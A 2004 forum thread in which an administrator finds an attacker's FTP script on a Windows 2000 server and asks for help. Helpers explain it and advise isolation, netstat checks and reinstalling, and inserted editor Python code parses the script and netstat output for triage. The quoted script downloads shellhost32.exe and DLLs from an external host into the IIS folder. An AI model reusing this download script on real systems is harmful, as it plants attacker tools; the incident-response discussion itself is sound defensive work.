I inherited servers: W2K, W2003; no, no SBS in this network.
Can I still ask the question here?

I was browsing one W2K server and I found a hidden folder in the C: drive
called "x", with a file in it called "x.txt".

Opening this file shows:

open x.x.x.x 33333
USER hack
hack
GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
bye

Can someone please explain what the above does and how I can verify
whether this hacker has left backdoors, trojan horses, etc.?

Running Windows Update on this server shows me 38 or 39 Critical Updates.
Is there good documentation out there that explains that running Windows Update
is actually a good thing to do rather than bad? A management person is asking
me to test each critical update before I apply it on the production server.

Also, I am trying to look for real facts on upgrading to W2003 servers and
IIS 6.0 rather than using W2K and IIS 5. Are there any white papers or other
documentation that can help me make this case?

I would appreciate any help, info, ...

Thank you very much

Re: One of my W2K servers hacked? by Marina

Marina
Thu Nov 11 18:41:27 CST 2004

Hi Serge,

If this server is hacked, you want to disconnect it from the internet now!
You don't update, you reinstall from scratch. The other server and clients
might be hacked too. If you run a netstat, which ports are open? If there is
a port 21 and/or 80, forget the whole thing and reinstall.

--
Regards,

Marina
Microsoft SBS-MVP

"serge" <sergea@nospam.ehmail.com> schreef in bericht
news:j5Tkd.46986$km5.1770558@news20.bellglobal.com...
> I inherited servers : W2K, W2003, no, no SBS in this network.
> Can i still ask the question here?
>
> I was browsing one W2K server and i found a hidden folder in C: Drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how can i verify
> if this hacker has left backdoors, trojan horses etc...?
>
> Running Windows Update on this server shows me 38 or 39 Critical Updates.
> Is there good documentation out there that explains running Windows Update
> is actually a good thing to do rather than bad. A management person is
> asking
> me to test each critical update before i apply it on the production
server.
>
> Also, i am trying to look for real facts on upgrading to W2003 servers and
> IIS6.0
> rather than using W2K and IIS5. Are there any white papers or other
> documentation
> that can help me make this case?
>
> I would appreciate any help, info, ...
>
> Thank you very much



Re: One of my W2K servers hacked? by Kevin

Kevin
Thu Nov 11 23:08:10 CST 2004

What? Are you really asking whether it's a good or bad idea to apply
critical security patches to a server? And then someone's asking you to
test each critical patch before installing it on a server that has been
hacked and is no longer trustworthy?

It's up to you whether you want to take on this job for this customer of
yours, but if you do -- you tell them that the only acceptable solution is
to reformat and reload this server. Even the workstations attached should be
called into question, as well as all data files.

They are up to their neck in trouble!
--
Kevin Weilbacher [SBS-MVP]
"The days pass by so quickly now, the nights are seldom long"


"serge" <sergea@nospam.ehmail.com> wrote in message
news:j5Tkd.46986$km5.1770558@news20.bellglobal.com...
>I inherited servers : W2K, W2003, no, no SBS in this network.
> Can i still ask the question here?
>
> I was browsing one W2K server and i found a hidden folder in C: Drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how can i verify
> if this hacker has left backdoors, trojan horses etc...?
>
> Running Windows Update on this server shows me 38 or 39 Critical Updates.
> Is there good documentation out there that explains running Windows Update
> is actually a good thing to do rather than bad. A management person is
> asking
> me to test each critical update before i apply it on the production
> server.
>
> Also, i am trying to look for real facts on upgrading to W2003 servers and
> IIS6.0
> rather than using W2K and IIS5. Are there any white papers or other
> documentation
> that can help me make this case?
>
> I would appreciate any help, info, ...
>
> Thank you very much
>



Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 06:40:16 CST 2004

Thank you both.

There are no workstations but other servers exist.

Reinstalling the server and the other servers is not feasible at this
moment. One of the first things I need to do is understand what that text
of "hacking" does, did or can still do. I am also trying to figure out if
there's a step-by-step document that tells you what to check/do from A to Z
to see if you're hacked or not. A book could be very useful too.

Thanks again.



Re: One of my W2K servers hacked? by Marina

Marina
Fri Nov 12 07:04:20 CST 2004

Hi Serge,

Use the netstat -an command to see what ports are open and post that here.

--
Regards,

Marina
Microsoft SBS-MVP

"serge" <sergea@nospam.ehmail.com> schreef in bericht
news:Qa2ld.47577$km5.1999803@news20.bellglobal.com...
> Thank you both.
>
> There are no workstations but other servers exist.
>
> Reinstalling the server and the other servers is not feasible at this
> moment.
> One of the first things i need to do is understand what that text of
> "hacking" does, did
> or can still do. I am also trying to figure out if there's a step-by-step
> document that tells
> you what to check/do from A to Z to see if you're hacked or not. Or a book
> could be
> very useful too.
>
> Thanks again.



Re: One of my W2K servers hacked? by Alexander

Alexander
Fri Nov 12 08:25:52 CST 2004

serge wrote:

> I inherited servers : W2K, W2003, no, no SBS in this network.
> Can i still ask the question here?
>
> I was browsing one W2K server and i found a hidden folder in C: Drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how can i verify
> if this hacker has left backdoors, trojan horses etc...?

These appear to me to be FTP commands. Did you replace the IP address in the
file with x.x.x.x? In principle, these are the commands that you need to
copy the listed files from the server x.x.x.x:33333, logging in as user
hack with password hack, to the directory c:\winnt\system32\inetsrv\data.
If there is a webserver running, it is possible that these files are
accessible from the internet.

As a first step you should remove these files, if they exist, from this
directory. Do not delete them, you might want to analyze them (e.g. a virus
scanner could be able to tell you which virus/trojan/backdoor it is).

It definitely is an idea to scan the full hard disk with a virus scanner.
This should be done by booting from a clean disk, e.g. a bootable CD with a
virus scanner (don't forget to update the signatures). But if this scanner
does not find anything, you are not necessarily free of any backdoors.

And, as Marina and Kevin suggested, run netstat to look for any open ports.

But if there is only the slightest hint that the system was compromised, you
have to remove the server from the internet immediately and reinstall as
soon as possible.

Regards, Alex
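Alexander reads the x.txt as a script for the Windows ftp.exe client. For responders who want to turn such a script into a checklist of what to look for on disk, here is an added example (editor's code, not from the thread or from any of the posters): it parses the `open` / `USER` / password / `GET` / `bye` sequence and returns the remote endpoint, the credentials used, and every local path the script would have written. The sample input is the script quoted in the thread (already masked as x.x.x.x by serge); the handling of `lcd`, `mget`, `put` and bare `get` goes beyond that script and is the editor's generalisation of ftp.exe's command set.

```python
"""Triage an ftp.exe command script and list the files it would drop.

Added example; it assumes the script uses the plain ftp.exe command
vocabulary (open, user, lcd, get/recv, mget, put/send, bye/quit) and
that a bare "user NAME" line is followed by the password on its own line,
exactly as in the x.txt posted in the thread.
"""
import ntpath
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: the script quoted in the thread.
SAMPLE_SCRIPT = r"""open x.x.x.x 33333
USER hack
hack
GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
bye
"""


@dataclass
class FtpScriptSummary:
    host: Optional[str] = None
    port: int = 21                      # ftp.exe default when "open" gives no port
    user: Optional[str] = None
    password: Optional[str] = None
    downloads: List[Tuple[str, str]] = field(default_factory=list)  # (remote name, local path)
    uploads: List[Tuple[str, str]] = field(default_factory=list)    # (local path, remote name)


def parse_ftp_script(text: str) -> FtpScriptSummary:
    """Walk the script line by line, tracking the local directory like ftp.exe does."""
    s = FtpScriptSummary()
    local_dir = "."              # changed by "lcd"; relative targets land here
    expect_password = False      # "user NAME" without password: next line is the password
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_password:
            s.password = line
            expect_password = False
            continue
        cmd, *args = line.split()
        cmd = cmd.lower()
        if cmd == "open" and args:
            s.host = args[0]
            if len(args) > 1 and args[1].isdigit():
                s.port = int(args[1])
        elif cmd == "user" and args:
            s.user = args[0]
            if len(args) > 1:
                s.password = args[1]
            else:
                expect_password = True
        elif cmd == "lcd" and args:
            local_dir = ntpath.join(local_dir, args[0])
        elif cmd in ("get", "recv") and args:
            remote = args[0]
            local = args[1] if len(args) > 1 else ntpath.basename(remote)
            s.downloads.append((remote, ntpath.normpath(ntpath.join(local_dir, local))))
        elif cmd == "mget":
            for remote in args:
                local = ntpath.normpath(ntpath.join(local_dir, ntpath.basename(remote)))
                s.downloads.append((remote, local))
        elif cmd in ("put", "send") and args:
            local = ntpath.normpath(ntpath.join(local_dir, args[0]))
            remote = args[1] if len(args) > 1 else ntpath.basename(args[0])
            s.uploads.append((local, remote))
        elif cmd in ("bye", "quit"):
            break
    return s


def dropped_paths(summary: FtpScriptSummary) -> List[str]:
    """The local paths a responder should check for (and preserve, not delete)."""
    return [local for _, local in summary.downloads]


if __name__ == "__main__":
    summary = parse_ftp_script(SAMPLE_SCRIPT)
    print(f"remote: {summary.host}:{summary.port}  login: {summary.user}/{summary.password}")
    for path in dropped_paths(summary):
        print("check:", path)
```

Running it against the thread's script prints the endpoint x.x.x.x:33333, the hack/hack login and the six paths under c:\winnt\system32\inetsrv\data; those paths (and any `lcd` directory, the TMP folder serge later mentions being the kind of thing to note) are what to inventory before anything is removed.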


Re: One of my W2K servers hacked? by Dave

Dave
Fri Nov 12 10:57:12 CST 2004

You may want to consider this article from security guru Jesper Johansson:

Help: I Got Hacked. Now What Do I Do?
http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx


"serge" <sergea@nospam.ehmail.com> wrote in message
news:Qa2ld.47577$km5.1999803@news20.bellglobal.com...
> Thank you both.
>
> There are no workstations but other servers exist.
>
> Reinstalling the server and the other servers is not feasible at this
> moment.
> One of the first things i need to do is understand what that text of
> "hacking" does, did
> or can still do. I am also trying to figure out if there's a step-by-step
> document that tells
> you what to check/do from A to Z to see if you're hacked or not. Or a book
> could be
> very useful too.
>
> Thanks again.



Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 20:12:35 CST 2004

Hi Marina,

> Use the netstat -an command to see what ports are open and post that here.

Here it is:


Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1032 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1039 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1120 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1560 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1566 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2735 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2736 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2737 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2739 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2745 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2746 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2751 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2752 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2753 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2755 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2756 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2757 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2759 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2760 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2761 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3335 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3372 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3580 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3906 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4240 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4280 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4295 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4365 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4408 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4409 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4507 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4641 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4783 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4810 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4815 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5168 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5169 0.0.0.0:0 LISTENING
TCP 0.0.0.0:55462 0.0.0.0:0 LISTENING
TCP 10.10.12.1:80 10.10.12.240:4409 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:4420 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:4429 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:4443 TIME_WAIT
TCP 10.10.12.1:80 10.10.12.240:53433 ESTABLISHED
TCP 10.10.12.1:139 0.0.0.0:0 LISTENING
TCP 10.10.12.1:1120 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2735 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2736 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2737 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2739 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2745 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2746 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2751 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2752 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2753 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2755 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2756 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2757 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2759 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2760 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:2761 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:3335 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:3389 10.10.12.201:21463 ESTABLISHED
TCP 10.10.12.1:3906 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4240 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4280 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4295 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4365 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4408 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4409 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4507 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4641 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4783 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:4805 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4807 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4808 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4809 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4810 10.10.12.202:445 ESTABLISHED
TCP 10.10.12.1:4813 10.10.12.59:1433 TIME_WAIT
TCP 10.10.12.1:4814 10.10.12.202:135 TIME_WAIT
TCP 10.10.12.1:4815 10.10.12.202:1025 ESTABLISHED
TCP 10.10.12.1:4821 10.10.12.202:135 TIME_WAIT
TCP 10.10.12.1:4822 10.10.12.202:1025 TIME_WAIT
TCP 10.10.12.1:4828 10.10.12.59:1433 TIME_WAIT
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1945 *:*
UDP 0.0.0.0:1993 *:*
UDP 0.0.0.0:3456 *:*
UDP 0.0.0.0:4824 *:*
UDP 0.0.0.0:7900 *:*
UDP 0.0.0.0:8998 *:*
UDP 10.10.12.1:137 *:*
UDP 10.10.12.1:138 *:*
UDP 10.10.12.1:500 *:*
UDP 10.10.12.2:500 *:*


Thank you
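Reading a `netstat -an` dump like the one above by eye is error-prone, so here is an added example (editor's code, not posted by anyone in the thread) that parses it and produces the summary Marina's reply asks for: which TCP ports are listening, which of them match the ports she singles out (21 and 80), which foreign endpoints are talking to each listening port, and which listeners have no connection at all and therefore still need to be tied to a process. The sample input is a constructed excerpt copied from serge's output; the "quiet listener" heuristic is the editor's, not something the thread states.

```python
"""Summarise Windows `netstat -an` output for incident triage.

Added example. Assumes the classic Windows netstat layout
(Proto, Local Address, Foreign Address, State) with IPv4 "addr:port"
endpoints and "*:*" for UDP.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: an excerpt of the output posted in the thread.
SAMPLE = """Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2735 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:55462 0.0.0.0:0 LISTENING
TCP 10.10.12.1:80 10.10.12.240:53433 ESTABLISHED
TCP 10.10.12.1:2735 10.10.12.59:1433 ESTABLISHED
TCP 10.10.12.1:3389 10.10.12.201:21463 ESTABLISHED
TCP 10.10.12.1:4805 10.10.12.59:1433 TIME_WAIT
UDP 0.0.0.0:445 *:*
UDP 10.10.12.1:137 *:*
"""

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s*(\S*)\s*$", re.IGNORECASE)

# Ports Marina's reply treats as reinstall-worthy if found listening.
SUSPECT_PORTS = (21, 80)


@dataclass(frozen=True)
class Socket:
    proto: str
    local_addr: str
    local_port: int
    foreign_addr: str
    foreign_port: Optional[int]   # None for UDP's "*:*"
    state: str                    # "" for UDP


def _split_endpoint(endpoint: str):
    addr, _, port = endpoint.rpartition(":")
    return addr, (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> List[Socket]:
    """Parse the data lines; headers and blank lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state = m.groups()
        laddr, lport = _split_endpoint(local)
        faddr, fport = _split_endpoint(foreign)
        if lport is None:
            continue
        sockets.append(Socket(proto.upper(), laddr, lport, faddr, fport, state.upper()))
    return sockets


def summarize(sockets: List[Socket]) -> Dict[str, object]:
    """Group connections by listening port and flag what needs a closer look."""
    listeners = {s.local_port for s in sockets if s.proto == "TCP" and s.state == "LISTENING"}
    peers_by_port = defaultdict(set)   # local port -> foreign endpoints seen on it
    peers = Counter()                  # foreign endpoint -> ESTABLISHED count
    for s in sockets:
        if s.proto != "TCP" or s.state == "LISTENING":
            continue
        endpoint = f"{s.foreign_addr}:{s.foreign_port}"
        peers_by_port[s.local_port].add(endpoint)
        if s.state == "ESTABLISHED":
            peers[endpoint] += 1
    return {
        "listeners": {p: sorted(peers_by_port.get(p, ())) for p in sorted(listeners)},
        # Listening with no connection at all: nothing in the dump explains them,
        # so these are the ports to map to a process first.
        "quiet_listeners": sorted(p for p in listeners if p not in peers_by_port),
        "flagged": sorted(p for p in SUSPECT_PORTS if p in listeners),
        "peers": peers,
    }


if __name__ == "__main__":
    report = summarize(parse_netstat(SAMPLE))
    for port, endpoints in report["listeners"].items():
        print(f"listening {port:>5}: {', '.join(endpoints) or '(no connections)'}")
    print("flagged (21/80):", report["flagged"])
    print("quiet listeners:", report["quiet_listeners"])
```

On the excerpt, port 80 is flagged (IIS is listening and serving 10.10.12.240), the ephemeral ports such as 2735 are shown next to their peer 10.10.12.59:1433 (so they are this host's side of SQL Server connections, not a service), and 135, 445 and 55462 come out as quiet listeners; 55462 in particular has nothing in the dump to explain it and is the kind of port to tie to a process before trusting the box.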




Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 20:13:55 CST 2004

Will check the link, Thanks!

> You may want to consider this article from security guru Jesper Johansson:
>
> Help: I Got Hacked. Now What Do I Do?
> http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx




Re: One of my W2K servers hacked? by serge

serge
Fri Nov 12 20:17:24 CST 2004


"Alexander Mattausch" <Alexander.Mattausch@physik.uni-erlangen.de> wrote in
message news:2vjvfjF2mu0peU1@uni-berlin.de...
> serge wrote:
>
>> I inherited servers : W2K, W2003, no, no SBS in this network.
>> Can i still ask the question here?
>>
>> I was browsing one W2K server and i found a hidden folder in C: Drive
>> called "x", with a file in it called "x.txt"
>>
>> Opening this file shows:
>>
>> open x.x.x.x 33333
>> USER hack
>> hack
>> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
>> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
>> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
>> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
>> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
>> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
>> bye
>>
>> Can someone please explain what the above does and how can i verify
>> if this hacker has left backdoors, trojan horses etc...?
>
> This appears to me as FTP commands. Did you replace the IP address in the
> file with x.x.x.x? In principle, these are the commands that you need to
> copy the listed files from the server x.x.x.x:33333, logging in as user
> hack with password hack, to the directory c:\winnt\system32\inetsrv\data.
> If there is a webserver running, it is possible that these files are
> accessible from the internet.

I see only one file, c:\winnt\system32\inetsrv\data\shellhost32.exe,
with 0 bytes; that's good, that means the file wasn't created. Don't ask me
to explain what a 0-byte file means because I don't know.
And I see a TMP folder created in the DATA folder, but the TMP folder contains
no files. So it seems that the hacker was unable to create any files. This
can only be a good thing.

> As a first step you should remove these files, if they exist, from this
> directory. Do not delete them, you might want to analyze them (e.g. a
> virus
> scanner could be able to tell you which virus/trojan/backdoor it is).

> It definitely is an idea to scan the full harddisk with a virus scanner.
> This should be done by booting from a clean disk, e.g. a bootable CD with
> a
> virus scanner (don't forget to update the signatures). But if this scanner
> does not find anything, you are not necessarily free of any backdoors.

I ran Trend Micro's HouseCall on the hard drives, no viruses were found.

> And, as Marina and Kevin suggested, run netstat to look for any open
> ports.

I posted the netstat results.

Thanks!